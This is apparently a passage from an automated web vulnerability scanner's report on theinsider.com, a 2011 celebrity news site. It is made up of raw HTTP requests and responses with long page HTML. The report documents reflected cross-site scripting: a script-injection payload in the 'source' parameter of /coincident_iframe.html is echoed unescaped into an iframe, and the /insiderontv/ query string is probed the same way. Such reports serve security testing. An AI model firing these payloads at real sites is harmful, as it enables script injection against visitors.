Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=299
Date: Tue, 06 Dec 2011 06:56:46 GMT
Content-Length: 13531
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title> - TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="Huffington Post Display" /> <meta name="date" content="2010-07-17 09:08:00" /><meta property="og:title" content="" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/inc/huffpost/display/43462_Huffpost_Display/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2010-07-17 09:08:00" /><Attribute name="sdate" value="20100717" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="/scripts/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <script type="text/javascript">$(document).ready(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><body class="body"> <!-- TOP LEADERBOARD AD --><div id='leaderboard-top-box'><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/Huffington Post Display_article;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/Huffington Post Display_article;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/Huffington Post Display_article;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

<a href="http://www.twitter.com/home?status=Huffpost+Display+http://insdr.co/uqJYFO+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
<!-- END HEADER --> <!-- END HEADER --> <!-- BELOW: article.mc --><!– Acudeo companion banner loader script –> <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script> <script type="text/javascript"> function displayCompanionBanners(banners) { tmDisplayBanner(banners, "adCompanionBanner", 300, 250); } </script> <!– Acudeo companion banner loader script –> <link rel='stylesheet' href='/inc/huffpost/display/css/huffpost.css' type='text/css' /><!--[if IE 7]><style>.contrib_date1 { font-size: 12px !important; font-weight: bold; margin: -10px 0 0 5px; font-family: 'AvalonBook',Futura,"Futura BT","Century Gothic",Tahoma,Helvetica,"Helvetica Neue",Arial,sans-serif;}.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}.lovethis_storylist ul {margin-left: 30px;}.contrib_date { font-size: 12px; font-weight: bold; margin: 0 0 0 68px;}</style><![endif]--><style>#huffpost_para { margin: 0 auto 20px; width: 640px;}#headline_popeater h1{margin-top:10px; width: 680px; margin: 0 auto; font-size: 28px; letter-spacing: -1px; font-family: 'AvalonBold',Futura,"Futura BT","Century Gothic",Tahoma,Helvetica,"Helvetica Neue",Arial,sans-serif !important; font-weight: bold; text-transform: uppercase;}.contrib_date1 { font-size: 11px !important; font-weight: normal !important; margin: 12px 0 0 5px !important; font-family: Tahoma, Helvetica, Arial, sans-serif;}.article-more-news-box img{float: left; margin-right: 15px;}#adCompanionBanner {background-color: white; text-align: left; margin: 10px 10px 10px 0;}.article-more-news-box {height: 100%; margin-bottom: 20px;}.contributor_bug {display: inline; height: 15px; padding: 0 0 0 10px; vertical-align: bottom; width: 71px;}.contrib_border { border-right: 1px solid #BBBBBB; float: left; font-size: 12px; font-weight: bold; line-height: 1; margin: -10px 0; font-family: Tahoma, Helvetica, Arial, sans-serif; padding-bottom:4px;} .contrib_border a:link, .contrib_border a:hover, .contrib_border a:visited, .contrib_border a:active {font-weight:bold;}.contrib_date {font-size: 12px; font-weight: bold; margin: -0px 0 0 68px;}.contrib_by { display: inline; float: left; font-size: 10px; height: 8px; margin: -7px 0 9px 0; width: 200px;}.contrib_container {height: 40px; border-bottom: 1px solid #000; float:left; width: 300px; padding-bottom:8px;}.contrib_cont {width: 300px; display: inline; height: 63px; float:left; margin: 0px 10px 10px 0px;}</style><!-- Main Content --><div id="main_content"><!-- LEFT COLUMN --><div id="left_col"><!-- CHANNEL TITLE --><div id="channel_title_bar"><img src="/media/img/huffPo700px.jpg" class="channel_title_logo" alt="" /></div><!-- END CHANNEL TITLE --><!-- Begin Article Display --> <div id="test_story_wrapper"> <div id="popeater_story_wrapper"> <div class="content_wrapper"> <div class="linkback3"> <!-- <a href="http://www.popeater.com" target="_blank">popeater link</a> --> </div> <div id="headline_popeater"> <h1></h1> </div> <div id="article_date" style="font-size:10px; margin: 10px 20px;"><div style="color: #666;"> By <br/> </div> </div> <div id="huffpost_para"> <img src='' style='display:block;float:left;margin: 0px 20px 10px 0;'> </div> </div><!-- End Article Display --><!-- STORY CONTAINER --><div class="content_container"><div class="channel_story_img"></div><p class='article'><h3></h3><p class='publish_date'></p><p class='publish_date'>July 17, 2010</p><p>

























</p><!-- <a href='' target='_blank'><img src='' alt='' class='contributor_bug' /></a> --></p> <!-- SOCIAL SHARE BTNS --> <div id="end_article_social_btns"> <div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.theinsider.com/inc/huffpost/display/43462_Huf..
- /coincident_iframe.html

/coincident_iframe.html

http://www.theinsider.com/coincident_iframe.html?source='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%..

Parameters

Parameter Type Value
source GET '"--></style></script><script>alert(0x000CA6)</script>

Request

GET /coincident_iframe.html?source='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000CA6)%3C/script%3E HTTP/1.1
Referer: http://www.theinsider.com/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 06:58:16 GMT
Content-Length: 824
Connection: keep-alive



<style>
.tab {
background: none repeat scroll 0 0 transparent !important;
height: 42px;
position: relative;
top: 0;
z-index: 999;
width: 100%;
}
.win_shift {
border: 0 none;
min-height: 519px;
margin-left: 5px;
width: 965px;
}

.jqmOverlay {
background-color: #000000;
position: fixed !important;
}


.jqmClose {
background: url("/media/img/btn_close3.png") no-repeat scroll 0 0 transparent;
clear: right;
display: block;
height: 30px;
width: 30px;
}
.jqmclosecontain {
display: block;
left: 968px;
position: relative;
top: -10px;
}

#div_video_top {
background-image: url("/media/img/coincident_modal_tp_v1.png");
height: 10px;
width: 998px;
}

#div_video_mid {
background-image: url("/media/img/coincident_modal_md_v1.png");
padding-bottom: 5px;
width: 998px;
}

#div_video_btm {
background-image: url("/media/img/coincident_modal_bt_v1.png");
height: 27px;
width: 998px;
}

#ctvWindow {
border: 0 none;
min-height: 519px;
margin-left: 12px;
/* overflow: hidden; */
width: 965px;
}
<!--[if IE 7 ]>
.jqmWindow {
background-color:transparent !important;
color:#000000;
display:none;
left:-25px;
margin-left:0;
position:relative;
top:-360px;
width:800px;
height: 0px;
}
<![endif]-->
</style>
<script>
function CTV_ctvWindowSize(wSize) {
document.getElementById('ctvWindow').style.height = wSize;
}
</script>
<div style="width: 1025px;">
<div id="div_video_top">
<div class="jqmCloseContain">
<a href="#" class="jqmClose"></a>
</div>
</div>
<div id="div_video_mid">
<div class="win_shift">
<iframe id="ctvWindow" frameborder="0" scrolling="no" src="http://www.theinsider.com/media/flash/coincident/index.html?media=http://www.theinsider.com'"--></style></script><script>netsparker(0x000CA6)</script>" width="70%" height="527"></iframe>
</div>
</div>
<div id="div_video_btm"></div>
</div>
- /insiderontv/

/insiderontv/

http://www.theinsider.com/insiderontv/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000C3C)..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000C3C)</script>

Request

GET /insiderontv/?'"--> HTTP/1.1
Referer: http://www.theinsider.com/insiderontv/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 06:58:00 GMT
Content-Length: 20161
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Insider OnTV | TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="insiderontv" /> <meta name="date" content="2011-06-30 11:59:00" /><meta property="og:title" content="Insider OnTV" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/insiderontv/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="Insider OnTV" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-06-30 11:59:00" /><Attribute name="sdate" value="20110630" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="/scripts/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <script type="text/javascript">$(document).ready(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--><link rel="stylesheet" href="http://detect.get.it/lb1/lightbox.css" /> <script> var getit_boxes = [ { id: 'lb1', width: 480, height: 235, noscroll: false, autopop: 'getit' } ]; </script> </head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><body class="body"> <!-- TOP LEADERBOARD AD --><div id='leaderboard-top-box'><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/insiderontv;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/insiderontv;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/insiderontv;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

<a href="http://www.twitter.com/home?status=Insider+OnTV+http://insdr.co/rO8GAc+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
<!-- END HEADER --> <!-- END HEADER --> <!-- INSIDER ON TV HUB: BELOW --><link rel="stylesheet" href="/inc/css/insiderontv/ontv.css" type="text/css" /><link rel="stylesheet" href="/inc/css/ontvinfiniteslider/infiniteslider_tv.css" type="text/css" /><style>.facebook_text {font-size: 12px; list-style-type: none; margin: 10px 0 0 -10px; padding: 0; width: 220px;}.vid_spacer {height: 240px; float: left; width: 220px; display:block;}#video { height: 450px; position: relative;}#featured_video_player_box2 { background-image: url("/media/img/insiderTVNewModule.jpg") !important; border: 2px solid #000000; height: 283px; margin-left: 30px; width: 640px;}.showImage { margin-bottom: 15px; margin-left: 2px;}#slate_player {float:right;}.infiniteCarousel .back { background-position: 0 -72px !important; left: 0;}#right_col { float: right; margin-right: 0px !important; width: 300px;}#content_under_gallery { margin-left: 30px; overflow: visible; position: relative; width: 643px;}/* YOU LOVE THIS STYLES */.last_column { border-right: medium none !important; padding-left: 20px; padding-right: 0;}.infiniteCarousel .arrow { background: url("/media/img/insidertv_slider_arrows.png") no-repeat scroll 0 0 transparent; cursor: pointer; display: block; height: 36px; position: absolute; text-indent: -999px; top: 37px; width: 37px; z-index: 6;}#lovethis_linkbox {background-image: url("/media/img/youlllovethis_bkg.jpg"); display: block; height: 344px; margin-top: 20px; width: 700px;}#lovethis_linkbox_innercontainer {margin-left: auto; margin-right: auto; width: 660px;}.lovethis_column {border-right: 1px solid #CCCCCC; float: left; margin-top: 35px; padding-right: 20px; width: 129px;}.lovethis_logoimg {height: 37px; text-align: center;}.lovethis_storylist {text-align: center;}.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px;}.lovethis_storylist li {border-bottom: 1px dotted #CCCCCC; font-size: 10px; line-height: 1; padding: 15px 5px; text-align: center;}.lovethis_storylist li a:hover, .lovethis_storylist li a:active {text-decoration: underline;}.lovethis_storylist li a:link, .lovethis_storylist li a:visited {color: #000000; font-weight: normal; text-decoration: none;}.lovethis_more_link:link, .lovethis_more_link:visited {color: #000000; font-size: 9px; font-weight: bold; line-height: 1; text-align: center;}h2.blogtitle { color: #FFFFFF; font-family: 'AvalonBook',Futura,"Futura BT","Century Gothic",Helvetica,"Helvetica Neue",Arial,sans-serif; font-size: 38px; font-weight: normal; letter-spacing: -1px; margin: 15px; padding-top: 10px; text-align: center;}#featured_video_player_box2 { background-image: url("/media/img/insiderTVVidPic2.jpg"); height: 283px; margin-left: 30px; width: 640px;}#blog_container { background-color: #F1A731; box-shadow: 0 0 25px #999999; height: 745px; margin-left: 5px; margin-top: 30px; width: 675px;}#social_network_box { background-color: #000000; box-shadow: 0 0 25px #999999; height: 525px; margin-left: 5px; margin-top: 30px; padding-bottom: 20px; width: 675px;}h3 {font-size: 28px; letter-spacing: -1px; margin: 10px 0 0 0; padding: 0;}#twitter_handles ul {list-style-type: none; margin: 0; padding: 0;}#outbrain_suggestions_wide { background-color: #F6F6F6; margin: 40px 10px; width: 660px;}#right_col { float: right; margin-right: 6px; width: 300px;}.caption { padding: 2px 12px 12px; width: 600px;}.showtitle { color: #FFFFFF; float: left; font-size: 20px; font-weight: bolder; margin: 18px; text-transform: uppercase;}.hideme {display: none;}body {background-attachment: fixed !important; background-image: url("/media/img/backgroundInsiderTV.jpg") !important; background-position: center top !important; background-repeat: no-repeat; margin: 0; padding: 0;}</style><!--[if IE]> <link rel="stylesheet" href="/nicole/css/ie_fix.css" type="text/css" /><style>.share_video_btns { float: left; margin-bottom: 5px; margin-left: 30px; margin-top: 5px;}</style><![endif]--><!--[if IE 7]><style>.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}</style><![endif]--><script type="text/javascript" src="/swfobject.js"></script><script type="text/javascript" src="http://ajax.goo..
